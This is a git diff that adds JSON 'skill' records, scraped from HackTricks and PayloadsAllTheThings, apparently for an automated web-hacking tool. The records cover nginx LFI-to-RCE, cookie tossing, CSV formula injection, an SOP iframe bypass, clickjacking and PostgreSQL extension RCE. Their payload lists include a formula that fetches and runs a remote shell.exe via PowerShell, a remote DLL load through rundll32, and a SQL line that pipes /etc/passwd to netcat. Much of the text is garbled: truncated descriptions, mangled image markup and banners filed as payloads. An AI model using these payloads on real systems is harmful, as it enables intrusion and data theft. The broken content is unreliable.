+ "## Classic exploitation workflow (recap)",
+ "1. **Enumerate worker PIDs.** Fetch `/proc//cmdline` over the LFI until you find strings like `nginx: worker process`. The number of workers rarely exceeds the CPU count, so you only have to scan the lower PID space."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_96d3e03bcae6.json b/skills/pentesting_web_96d3e03bcae6.json
new file mode 100644
index 0000000..9b3317c
--- /dev/null
+++ b/skills/pentesting_web_96d3e03bcae6.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_96d3e03bcae6",
+ "category": "pentesting-web",
+ "title": "cookie tossing",
+ "description": "# Cookie Tossing\n\n{{#include ../../banners/hacktricks-training.md}}\n\n### Description\n\nIf an attacker can **control a subdomain or the domain of a company or finds an XSS in a subdomain** he will be able to perform this attack.\n\nAs it was indicated in the Cookies Hacking section, when a **cookie is set to a domain (specifying it) it will be used in the domain and subdomains.**\n\n> [!CAUTION]\n> Therefore, **an attacker is going to be able to set to the domain and subdomains a specific cookie doing ",
+ "payloads": [
+ "# Cookie Tossing",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "### Description",
+ "If an attacker can **control a subdomain or the domain of a company or finds an XSS in a subdomain** he will be able to perform this attack.",
+ "As it was indicated in the Cookies Hacking section, when a **cookie is set to a domain (specifying it) it will be used in the domain and subdomains.**",
+ "> [!CAUTION]",
+ "> Therefore, **an attacker is going to be able to set to the domain and subdomains a specific cookie doing something like** `document.cookie=\"session=1234; Path=/app/login; domain=.example.com\"`",
+ "This can be dangerous as the attacker may be able to:",
+ "- **Fixate the cookie of the victim to the attacker's account** so if the user doesn't notice, **he will perform the actions in the attacker's account** and the attacker may obtain some interesting information (check the history of the searches of the user in the platform, the victim may set his credit card in the account...)",
+ "- An example of this [can be found here](https://snyk.io/articles/hijacking-oauth-flows-via-cookie-tossing/) where the attacker set his cookie in specific sections a victim will use to authorize **access to his git repos but from the attackers account** as he will be setting his cookies in the needed endpoints.",
+ "- If the **cookie doesn't change after login**, the attacker may just **fixate a cookie (session-fixation)**, wait until the victim logs in and then **use that cookie to log in as the victim**.",
+ "- Sometimes, even if the session cookies changes, the attacker use the previous one and he will receive the new one also.",
+ "- If the **cookie is setting some initial value** (like in flask where the **cookie** may **set** the **CSRF token** of the session and this value will be maintained after the victim logs in), the **attacker may set this known value and then abuse it** (in that scenario, the attacker may then make the user perform a CSRF request as he knows the CSRF token).",
+ "- Just like setting the value, the attacker could also get an unauthenticated cookie generated by the server, get the CSRF token from it and use it.",
+ "### Cookie Order"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/hacking-with-cookies/cookie-tossing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_97316b3816b3.json b/skills/pentesting_web_97316b3816b3.json
new file mode 100644
index 0000000..4c7dd70
--- /dev/null
+++ b/skills/pentesting_web_97316b3816b3.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_97316b3816b3",
+ "category": "pentesting-web",
+ "title": "formula csv doc latex ghostscript injection",
+ "description": "# Formula/CSV/Doc/LaTeX/GhostScript Injection\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Formula Injection\n\n### Info\n\nIf your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.\n\n> [!CAUTION]\n> Nowadays **Excel will alert** (several times) the **user whe",
+ "payloads": [
+ "# Formula/CSV/Doc/LaTeX/GhostScript Injection",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Formula Injection",
+ "### Info",
+ "If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.",
+ "> [!CAUTION]",
+ "> Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.",
+ "### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)",
+ "DDE (\"cmd\";\"/C calc\";\"!A0\")A0",
+ "@SUM(1+9)*cmd|' /C calc'!A0",
+ "=10+20+cmd|' /C calc'!A0",
+ "=cmd|' /C notepad'!'A1'",
+ "=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0",
+ "=cmd|'/c rundll32.exe \\\\10.0.0.1\\3\\2\\1.dll,0'!_xlbgnm.A1",
+ "### Hyperlink"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_97a69104fe01.json b/skills/pentesting_web_97a69104fe01.json
new file mode 100644
index 0000000..32e94d6
--- /dev/null
+++ b/skills/pentesting_web_97a69104fe01.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_97a69104fe01",
+ "category": "pentesting-web",
+ "title": "bypassing sop with iframes 2",
+ "description": "# Bypassing SOP with Iframes - 2\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Iframes in SOP-2\n\nIn the [**solution**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) for this [**challenge**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**,** [**@Strellic\\_**](https://twitter.com/Strellic_) proposes a similar method to the previous section. Let's check it.\n\nIn this challenge the attacker needs to **bypass** t",
+ "payloads": [
+ "# Bypassing SOP with Iframes - 2",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Iframes in SOP-2",
+ "In the [**solution**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution) for this [**challenge**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)**,** [**@Strellic\\_**](https://twitter.com/Strellic_) proposes a similar method to the previous section. Let's check it.",
+ "In this challenge the attacker needs to **bypass** this:",
+ "```javascript",
+ "if (e.source == window.calc.contentWindow && e.data.token == window.token) {",
+ "If he does, he can send a **postmessage** with HTML content that is going to be written in the page with **`innerHTML`** without sanitation (**XSS**).",
+ "The way to bypass the **first check** is by making **`window.calc.contentWindow`** to **`undefined`** and **`e.source`** to **`null`**:",
+ "- **`window.calc.contentWindow`** is actually **`document.getElementById(\"calc\")`**. You can clobber **`document.getElementById`** with **``** (note that Sanitizer API -[here](https://wicg.github.io/sanitizer-api/index.html#dom-clobbering)- is not configured to protect against DOM clobbering attacks in its default state).",
+ "- Therefore, you can clobber **`document.getElementById(\"calc\")`** with **``**. Then, **`window.calc`** will be **`undefined`**.",
+ "- Now, we need **`e.source`** to be **`undefined`** or **`null`** (because `==` is used instead of `===`, **`null == undefined`** is **`True`**). Getting this is \"easy\". If you create an **iframe** and **send** a **postMessage** from it and immediately **remove** the iframe, **`e.origin`** is going to be **`null`**. Check the following code",
+ "```javascript",
+ "let iframe = document.createElement(\"iframe\")",
+ "document.body.appendChild(iframe)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_9d50dbdd2aa6.json b/skills/pentesting_web_9d50dbdd2aa6.json
new file mode 100644
index 0000000..021731d
--- /dev/null
+++ b/skills/pentesting_web_9d50dbdd2aa6.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_9d50dbdd2aa6",
+ "category": "pentesting-web",
+ "title": "clickjacking",
+ "description": "# Clickjacking\n\n{{#include ../banners/hacktricks-training.md}}\n\n## What is Clickjacking\n\nIn a clickjacking attack, a **user** is **tricked** into **clicking** an **element** on a webpage that is either **invisible** or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as the downloading of malware, redirection to malicious web pages, provision of credentials or sensitive information, money transfers, or the online purchasing of products.\n\n",
+ "payloads": [
+ "# Clickjacking",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## What is Clickjacking",
+ "In a clickjacking attack, a **user** is **tricked** into **clicking** an **element** on a webpage that is either **invisible** or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as the downloading of malware, redirection to malicious web pages, provision of credentials or sensitive information, money transfers, or the online purchasing of products.",
+ "### Prepopulate forms trick",
+ "Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.",
+ "### Populate form with Drag\\&Drop",
+ "If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like the email and or specific password that you know), you can just ask him to **Drag\\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).",
+ "### Basic Payload",
+ "```css",
+ "\\x3csVg/
![\"\"](\"../../images/image)
![\"\"](\"../../../../../images/arte.png\")
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)![\"\"](\"../../../../../images/grte.png\")
[**HackTricks Train",
+ "payloads": [
+ "> [!TIP]",
+ "> Learn & practice AWS Hacking:![\"\"](\"../../../../../images/azrte.png\")
[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)![\"\"](\"../../../images/image)
![\"banner\"](\"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png\")
",
+ "- [InternalAllTheThings](https://swisskyrepo.github.io/InternalAllTheThings/) - Active Directory and Internal Pentest Cheatsheets",
+ "- [HardwareAllTheThings](https://swisskyrepo.github.io/HardwareAllTheThings/) - Hardware/IOT Pentesting Wiki",
+ "You want more? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [YouTube channel](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections.",
+ "Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CONTRIBUTING.md)",
+ "![\"sponsor-serpapi\"](\"https://avatars.githubusercontent.com/u/34724717?s=40&v=4\")
](https://serpapi.com) | **SerpApi** is a real time API to access Google search results. It solves the issues of having to rent proxies, solving captchas, and JSON parsing. |",
+ "| [![\"sponsor-projectdiscovery\"](\"https://avatars.githubusercontent.com/u/50994705?s=40&v=4\")
](https://projectdiscovery.io/) | **ProjectDiscovery** - Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives. |",
+ "| [![\"sponsor-vaadata\"](\"https://avatars.githubusercontent.com/u/48131541?s=40&v=4\")
](https://www.vaadata.com/) | **VAADATA** - Ethical Hacking Services |"
+ ],
+ "references": [
+ "PayloadsAllTheThings/README.md"
+ ],
+ "source": "PayloadsAllTheThings"
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_029c5b1df41a.json b/skills/pentesting_web_029c5b1df41a.json
new file mode 100644
index 0000000..a557167
--- /dev/null
+++ b/skills/pentesting_web_029c5b1df41a.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_029c5b1df41a",
+ "category": "pentesting-web",
+ "title": "rce with postgresql extensions",
+ "description": "# RCE with PostgreSQL Extensions\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## PostgreSQL Extensions\n\nPostgreSQL has been developed with extensibility as a core feature, allowing it to seamlessly integrate extensions as if they were built-in functionalities. These extensions, essentially libraries written in C, enrich the database with additional functions, operators, or types.\n\nFrom version 8.1 onwards, a specific requirement is imposed on the extension libraries: they must be compi",
+ "payloads": [
+ "# RCE with PostgreSQL Extensions",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## PostgreSQL Extensions",
+ "PostgreSQL has been developed with extensibility as a core feature, allowing it to seamlessly integrate extensions as if they were built-in functionalities. These extensions, essentially libraries written in C, enrich the database with additional functions, operators, or types.",
+ "From version 8.1 onwards, a specific requirement is imposed on the extension libraries: they must be compiled with a special header. Without this, PostgreSQL will not execute them, ensuring only compatible and potentially secure extensions are used.",
+ "Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)",
+ "### RCE in Linux",
+ "**For more information check: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**",
+ "The execution of system commands from PostgreSQL 8.1 and earlier versions is a process that has been clearly documented and is straightforward. It's possible to use this: [Metasploit module](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).",
+ "```sql",
+ "CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;",
+ "SELECT system('cat /etc/passwd | nc ![https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png](\"https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png\"){kind=link}